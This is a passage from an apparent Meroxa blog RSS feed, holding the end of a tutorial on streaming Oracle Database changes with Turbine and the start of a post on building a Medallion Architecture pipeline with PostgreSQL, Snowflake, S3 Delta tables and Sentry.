&lt;h3&gt;&lt;strong&gt;Real-Time Data Streaming with Change Data Capture&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Using Change Data Capture (CDC), we can process Oracle Database data record events in real-time. We do this by creating a tracking table and a database trigger to track event records.&lt;/p&gt;
&lt;p&gt;The tracking table and trigger name have the same names as a source table with the prefix MEROXA. The tracking table has all the same columns as the source table plus three additional columns:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Column name&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CONNECTOR_TRACKING_ID&lt;/td&gt;
&lt;td&gt;The auto-increment index for the position.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CONNECTOR_OPERATION_TYPE&lt;/td&gt;
&lt;td&gt;The operation type, whether &lt;strong&gt;INSERT&lt;/strong&gt;, &lt;strong&gt;UPDATE&lt;/strong&gt;, or &lt;strong&gt;DELETE&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CONNECTOR_TRACKING_CREATED_AT&lt;/td&gt;
&lt;td&gt;The timestamp of event record creation in the tracking table.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;An event record will be written in a tracking table when data is added, changed, or deleted from an Oracle Database table. The queries retrieving these event records from the tracking table are similar to those used in Snapshot mode but with CONNECTOR_TRACKING_ID as the ordering column.&lt;/p&gt;
&lt;p&gt;An Ack method will collect the CONNECTOR_TRACKING_ID of the event records successfully applied and are later removed from the tracking table every 5 seconds or when the connection is closed.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Things to be aware of...&lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Changes sometimes need to be made to columns in an Oracle Database table. The changes must also be applied to the tracking table when this happens by your Oracle Database administrator.&lt;/li&gt;
&lt;li&gt;All tracking information only exists within the Oracle Database. Upon deletion of the tracking table, the tracking process will restart from the beginning by initiating a new snapshot of the table, which could lead to unintended replication of data downstream.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Creating an Oracle Database Resource on the Meroxa Platform&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Customers can create Resources for Oracle Databases using the Meroxa CLI or Dashboard. You must have a Meroxa account and be logged in to your account to get started.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Meroxa CLI&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;In the following example, we create an Oracle Database Resource named &lt;strong&gt;my-oracle-db&lt;/strong&gt;. Resource names may contain lowercase letters, numbers, underscores, and hyphens. Use this name to reference your Oracle Database when writing your Turbine application code.&lt;/p&gt;
&lt;p&gt;Using the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;, run the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create my-oracle-db &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; oracle –-url oracle://user:password@host.com:1571/database&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;&lt;strong&gt;Meroxa Dashboard&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Below are the steps required to create an Oracle Database Resource using the &lt;a href=&quot;https://dashboard.meroxa.io/resources/new?type=oracle&quot;&gt;Meroxa Dashboard&lt;/a&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Navigate to the &lt;strong&gt;Resources&lt;/strong&gt; tab.&lt;/li&gt;
&lt;li&gt;Click the &lt;strong&gt;Add a Resource&lt;/strong&gt; button.&lt;/li&gt;
&lt;li&gt;Search for &lt;strong&gt;Oracle DB&lt;/strong&gt; using the search bar.&lt;/li&gt;
&lt;li&gt;Click the &lt;strong&gt;Add Resource&lt;/strong&gt; button for &lt;strong&gt;Oracle DB&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Confirm you are on the Add a resource form with Oracle DB selected.&lt;/li&gt;
&lt;li&gt;Provide a valid Resource Name (e.g., &lt;strong&gt;my-oracle-db&lt;/strong&gt;, &lt;strong&gt;myoracle&lt;/strong&gt;, &lt;strong&gt;oracle123&lt;/strong&gt;).&lt;/li&gt;
&lt;li&gt;Provide a valid Connection URL for your Oracle Database instance (.e.g., oracle://user:&lt;a href=&quot;mailto:password@host.com&quot;&gt;password@host.com&lt;/a&gt;:1571/database-name)&lt;/li&gt;
&lt;li&gt;Click the Save button.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;A notification in the dashboard will appear once your Oracle Database Resource has been successfully created.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Using Oracle Database as a Source with Turbine&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Using Turbine, customers can use any Turbine-supported language such as JavaScript, Python, Ruby, or Go to stream and transform business-critical data from an Oracle Database table to any destination.&lt;/p&gt;
&lt;p&gt;The following example demonstrates how to do this with TurbinePy using Python.&lt;/p&gt;
&lt;p&gt;First, initialize your Turbine streaming app by running the following command in the Meroxa CLI:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app init my-first-app –-lang python&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You should receive confirmation from the Meroxa CLI that you&apos;ve initialized your Turbine streaming app, meaning the application files have been created locally in the current directory.&lt;/p&gt;
&lt;p&gt;From this point, run the following command to get to the root of the application code.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; my-first-app&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Within your Turbine streaming app you will discover a &lt;strong&gt;main.py&lt;/strong&gt; file. Open this with your preferred code editor. You will see self-documented boilerplate code with a custom function written against the example data record set provided in a fixtures directory.&lt;/p&gt;
&lt;p&gt;Look for the following code with the &lt;strong&gt;resources&lt;/strong&gt; and &lt;strong&gt;records&lt;/strong&gt; methods:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;source_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;collection_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;strong&gt;resources&lt;/strong&gt; method is used to specify a Resource on the Meroxa Platform. Replace &lt;strong&gt;source_name&lt;/strong&gt; with the name of your Oracle Database Resource. In the following example, we’ll use the name we used when creating the Oracle Database Resource &lt;strong&gt;my-oracle-db&lt;/strong&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;my-oracle-db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;strong&gt;records&lt;/strong&gt; method is used to specify the respective table you wish to use as the source of data. In the following example, there is a table called &lt;strong&gt;transactions&lt;/strong&gt;. Replace &lt;strong&gt;collection_name&lt;/strong&gt; with the name of your Oracle Database table.&lt;/p&gt;
&lt;p&gt;In addition, you will need to indicate which field will be used for ordering rows. This column must contain unique values that can be used for sorting otherwise, the snapshot will not work properly. In the following example, we will use the &lt;strong&gt;id&lt;/strong&gt; column.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;transactions&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;orderingColumn&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There are a few additional configurations for Oracle Database Source data integrations that can be defined in your Turbine application code. In the following example, we want to change the &lt;strong&gt;batchSize&lt;/strong&gt; from its default value of &lt;strong&gt;1000&lt;/strong&gt; to &lt;strong&gt;2000&lt;/strong&gt;. We do this by including another key value pairing in the configuration which is the second argument of the &lt;strong&gt;records&lt;/strong&gt; method.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;transactions&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;orderingColumn&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;”batchSize”&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;”&lt;span class=&quot;token number&quot;&gt;2000&lt;/span&gt;”&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Below is a list of the supported configurations for Oracle Database sources.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Configuration&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Requirement&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Example value&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;orderingColumn&lt;/td&gt;
&lt;td&gt;Required.&lt;/td&gt;
&lt;td&gt;The column name that the connector will use for ordering rows. Column must contain unique values and be suitable for sorting, otherwise the snapshot won&apos;t work correctly.&lt;/td&gt;
&lt;td&gt;id&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;snapshot&lt;/td&gt;
&lt;td&gt;Optional, default value is true.&lt;/td&gt;
&lt;td&gt;Enables or disables snapshots of the entire Oracle DB table before starting Change Data Capture (CDC) mode.&lt;/td&gt;
&lt;td&gt;false&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;batchSize&lt;/td&gt;
&lt;td&gt;Optional, default value is 1000.&lt;/td&gt;
&lt;td&gt;Sets the size of the rows batch. Min is 1 and max is 100000.&lt;/td&gt;
&lt;td&gt;100&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;keyColumns&lt;/td&gt;
&lt;td&gt;Optional.&lt;/td&gt;
&lt;td&gt;If the field is empty, the connector makes a request to the database and uses the received list of primary keys of the specified table. If the table does not contain primary keys, the connector uses the value of the orderingColumn field as the keyColumns value.&lt;/td&gt;
&lt;td&gt;id,uuid&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;columns&lt;/td&gt;
&lt;td&gt;Optional.&lt;/td&gt;
&lt;td&gt;A list of column names that should be included in each record&apos;s payload, by default includes all columns.&lt;/td&gt;
&lt;td&gt;id,name,age&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;You’re ready to start streaming with an Oracle Database as a source for your Turbine streaming app!&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;What&apos;s next?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;All that&apos;s left for you to do is to write function code to transform the streaming data and event records to a downstream set of Resources or third-party APIs.&lt;/p&gt;
&lt;p&gt;Need ideas for a Turbine app using Oracle Database as a source? Check out &lt;a href=&quot;https://github.com/meroxa/turbine-examples&quot;&gt;our example Turbine apps&lt;/a&gt; to get started. But don&apos;t let this example hinder you. The sky&apos;s the limit for what you and your team can achieve.&lt;/p&gt;
&lt;p&gt;We can’t wait to see what you build! 🚀&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need help or have questions, please reach out at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Medallion Architecture + Meroxa: Easily Work with Massive Amounts of Data]]></title><description><![CDATA[Learn how to implement the Medallion Architecture using Meroxa to streamline analytics and make it easier to work with large amounts of data.]]></description><link>https://meroxa.com/blog/medallion-architecture-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/medallion-architecture-meroxa</guid><dc:creator><![CDATA[Eric Cheatham and Tanveet Gill]]></dc:creator><pubDate>Fri, 03 Mar 2023 19:32:48 GMT</pubDate><content:encoded>&lt;p&gt;In today&apos;s data-driven world, the challenges of processing and analyzing large amounts of data continue to grow. Traditional data architectures take time to implement and don’t meet the needs of analytics on demand. Many organizations have created their own way to logically represent data as it is processed to help address the ever-increasing challenges of working with data; one such solution is the Medallion Architecture from &lt;a href=&quot;https://www.databricks.com/&quot;&gt;Databricks&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The Medallion Architecture is a design pattern used to logically organize data in a &lt;a href=&quot;https://www.databricks.com/glossary/data-lakehouse&quot;&gt;Data Lakehouse&lt;/a&gt;, with the goal of progressively improving the overall quality of the data. It uses the &lt;a href=&quot;https://delta.io/&quot;&gt;Delta Lake framework&lt;/a&gt; to logically organize the data into three layers: Bronze, Silver, and Gold. At each layer, the data is refined to make the curated business-level tables more accessible, accurate, and actionable.&lt;/p&gt;
&lt;p&gt;In this blog post, we demonstrate how you can implement the Medallion Architecture using Meroxa and Turbine to streamline analytics and make it easier to work with large amounts of data.&lt;/p&gt;
&lt;p&gt;💡 You can read the Databricks primer here to learn more about the Medallion Architecture and how it improves the data.&lt;/p&gt;
&lt;h2&gt;What is Meroxa?&lt;/h2&gt;
&lt;p&gt;Meroxa is a Stream Processing Application Platform as a Service (SAPaaS) where developers can run and scale their Turbine apps using cloud-native best practices. Turbine is Meroxa’s stream processing application framework for building event-driven stream-processing apps that respond to data in real-time.&lt;/p&gt;
&lt;p&gt;Meroxa handles the underlying streaming infrastructure so developers can focus on building their applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will take care of streaming the data into the Turbine application so it can be run.&lt;/p&gt;
&lt;p&gt;Since Meroxa is a developer-first platform, engineers can ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know, such as &lt;a href=&quot;https://github.com/meroxa/turbine-go&quot;&gt;Go&lt;/a&gt;, &lt;a href=&quot;https://github.com/meroxa/turbine-js&quot;&gt;JavaScript&lt;/a&gt;, &lt;a href=&quot;https://github.com/meroxa/turbine-py&quot;&gt;Python&lt;/a&gt;, or &lt;a href=&quot;https://meroxa.com/blog/meroxa-now-streaming-on-ruby&quot;&gt;Ruby&lt;/a&gt;. Support for Java, and C# is on the way.&lt;/p&gt;
&lt;p&gt;💡 Meroxa has support for many source and destination resources. You can see which resources are supported &lt;a href=&quot;https://meroxa.com/integrations/&quot;&gt;here&lt;/a&gt;. If there&apos;s a resource not listed you can request it by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.com&lt;/a&gt;. Meroxa is capable of supporting **any** data resource as a connector.&lt;/p&gt;
&lt;h2&gt;Overview&lt;/h2&gt;
&lt;p&gt;We want to implement a Delta Lake architecture using Meroxa and Turbine as our transition from Bronze, to Silver, and ultimately to business-level Gold level data stores. To accomplish this we will use the following resources; all managed by the Meroxa platform:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Bronze: PostgreSQL will serve as our raw, unfiltered data ingested from various sources&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Silver: Snowflake will serve as our intermediate cleaned and enriched data storage; valuable but not 100% business ready&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Gold: Amazon Web Services S3 will be where our business-ready data will live, normalized and stored in the Delta Table format&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As a bonus, we will also set up logging using &lt;a href=&quot;https://sentry.io/&quot;&gt;Sentry&lt;/a&gt;, an error tracking and monitoring platform, to catch and report any exceptions that come up when writing our data.&lt;/p&gt;
&lt;p&gt;Visually, our application will look like this:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/s8kxiMMDfxsLi0lC5_t-PWn6eWvzmg16_zage08dS8R3VhwkH4WbWYFrqtnXZF3b7u7TNqk0BoYTYQBcEtO61EwfUrQPz_JAAjNapYwFfXy4HbJ4CnWubwRI4jB9TpB36n06vsZhGfDKC99jqsbyCik&quot; alt=&quot;Diagram&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Let’s get to the code&lt;/h2&gt;
&lt;p&gt;But first…&lt;/p&gt;
&lt;p&gt;Before we can begin we will need to set up a few things.&lt;/p&gt;
&lt;p&gt;First, on the Meroxa Platform we will need both a &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;PostgreSQL&lt;/a&gt; resource and a &lt;a href=&quot;https://docs.meroxa.com/platform/resources/snowflake&quot;&gt;Snowflake&lt;/a&gt; resource. Using the documentation we can set up our Bronze PostgreSQL and Silver Snowflake resources.&lt;/p&gt;
&lt;p&gt;Secondly, we will need to set up our S3 bucket that will serve as our Delta Table resource. Although we will not need to add our S3 bucket to the Meroxa Platform in this particular example we will still need to set up access permissions as though we were. We can find those permissions in our &lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3#permissions&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In addition to setting up our resources we will also need to gather a few extra bits of information. We need to set up the following environment variables:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Environment Variable&lt;/td&gt;
&lt;td&gt;Description&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS_ACCESS_KEY_ID&lt;/td&gt;
&lt;td&gt;AWS Access Key for user accessing buckets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS_SECRET_ACCESS_KEY&lt;/td&gt;
&lt;td&gt;AWS Secret for user accessing buckets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS_REGION&lt;/td&gt;
&lt;td&gt;Region the bucket was created in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS_URI&lt;/td&gt;
&lt;td&gt;The actual URI of the bucket (e.g.: S3://bucket-name/key-name )&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SENTRY_DSN&lt;/td&gt;
&lt;td&gt;Sentry Data Source Name (DSN) to upload logs and errors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GOOGLE_API_KEY&lt;/td&gt;
&lt;td&gt;API Key to access Google Location API&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;We will address each one of these variables as we walk through our example.&lt;/p&gt;
&lt;h3&gt;Writing our Turbine App&lt;/h3&gt;
&lt;p&gt;Our Turbine application has three main tasks: read our raw data from our Bronze data source, transform our data for Silver intermediate data store, and ultimately write to our Delta Table in our Gold destination.&lt;br&gt;
To start, we first need to retrieve our raw data. Turbine enables us to stream rows, referred to as Records in Turbine, from our Bronze database, in this case a PostgreSQL database from the “employees” table.&lt;img src=&quot;https://lh3.googleusercontent.com/-OoL9ZgLvlxpYd5P049ayZnIe_V3DtrSyVFtFaRBptxS-385wopUk07zdJLmutP9gmoy4q8wEws4QyjZ1PH-XIrUNEBfI7XHxXcYxHHf7-xGbwBEkwcds769oO1jDbsqvFEnq1oa6M9ghZScbtK1gL4&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;Taking a quick look at our raw data, we can see that Turbine has formatted it as JSON.&lt;br&gt;
&lt;img src=&quot;https://lh4.googleusercontent.com/1Qb_HGhgsHt59-fiOWokVR-Md7nYewuRH4xtUFekFPJML3I-ietRLOoG4lL90D0oKR0PDZm98RefFEYmmhvnMeaZZXbX8mwOVZwDSBhP3PlDGOztidGSVreYn8Cp9l6-05p5YDBm5AmjAq6qRC80BBE&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;With our raw data in hand, our next step is to enrich said data. For this example we want to translate the postcode on our record to Latitude and Longitude through the use of &lt;a href=&quot;https://developers.google.com/maps/documentation/address-validation&quot;&gt;Google Address Validation API&lt;/a&gt;. This can be accomplished by using the Requests library to make a GET request against the Address Validation and obtain our enhancement.&lt;/p&gt;
&lt;p&gt;Notice that nothing in this code is specific to Turbine. The great thing about this code is that it is not Turbine specific. This particular code can be run alone as is.&lt;br&gt;
&lt;img src=&quot;https://lh6.googleusercontent.com/S-AAJrY75hkwKfvXVUM6_i5zZej_mh_O-vh_J5p7rDZKbD78I_46jviAbR98rqudQl6V5vXQqJYo-9gDhhupGh1eXAi77SFHtNcstKLv1Mu6NC19jI6k-ExGgw_SZSbT9xmxtJ710av-OakLbHPtQNI&quot; alt=&quot;Code snippet&quot;&gt;&lt;br&gt;
Another great feature of Turbine is that it allows us to abstract out any logic we want into a separate module so we can keep our code neat and organized. Here we have chosen to move our enrichment logic into a module called enrich.py&lt;/p&gt;
&lt;p&gt;We extract the postcode from each &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python#records-and-events&quot;&gt;Record&lt;/a&gt;, a JSON representation of each row in our Bronze database, and enrich it using our previously created logic. Once we’ve set up our processing logic we can use Turbine to execute our logic and write to our Silver database in only three lines of code. &lt;img src=&quot;https://lh4.googleusercontent.com/8fZm9JZdeSPQrRzdfgd_9dhXEWp5UY19HLhQypR63ku0gWsSCen4O8boMq61MKAi70oZ6Ptrj0KNym113sMYl0GwU9rEqlIbd5PE96l9P3IT6nFSmvFRrpS_9XZ6Ko5M62m5e_a5fKsZ3G-eJuNlJ58&quot; alt=&quot;Code snippet&quot;&gt;&lt;br&gt;
But we still need to write to our Gold database; our Delta Lake. Here we are using &lt;a href=&quot;https://github.com/delta-io/delta-rs&quot;&gt;delta-rs&lt;/a&gt;, a Rust library with Python bindings, to initialize and write to our Delta Lake. Like our enrichment logic from before, this logic contains nothing Turbine specific and can be run on its own. In addition to our Delta writing logic we also use the &lt;a href=&quot;https://docs.sentry.io/platforms/python/&quot;&gt;Sentry SDK&lt;/a&gt; to log any errors we may encounter.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/mF75kldBYYN7e0VHUTNzObqW9uNsFbL4p_AmbJyiSYLwlKQtVxTjY_4BpMRcEIt7Upvst9PmAnd58647Vgc9UppkaUIkeMgiDyDMJt-Mubx2Aa1erdB8ZJ0Q0ZBpzVu3AlIkuQlx5Kmj2R2YjJK1xyE&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Putting It All Together&lt;/h3&gt;
&lt;p&gt;All that’s left now is to piece it all together in our `main.py` module. Here we see how the Turbine framework helps us connect our source, enrichment logic, and finally our destinations together.&lt;img src=&quot;https://lh3.googleusercontent.com/NwN5HQ4t4h5nPfFUR10CcBEBojXSFUj0RqHpw48nkYlfIEAvgJKPZhcSXgdxZlf7Nvtr1ajAFToT2-HWO5wilkGhOrzPAKA1Io5drMAyWfezawMipaBRtjCQDre8FqsYzC7poJNUEwyEcxI8qAbgpDU&quot; alt=&quot;Code snippet&quot;&gt; Remember the bonus logging we mentioned before? In our complete Turbine application we’ve added an invocation of the sentry_sdk initialization function. Although turbine handles execution of your code for you. Youare more than welcome to bring your own logging tools for that extra bit of insight into how your code is performing.&lt;/p&gt;
&lt;h3&gt;Deploying our Application&lt;/h3&gt;
&lt;p&gt;Now let&apos;s get our application up and running. Using git and the Meroxa CLI we will run the following commands:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
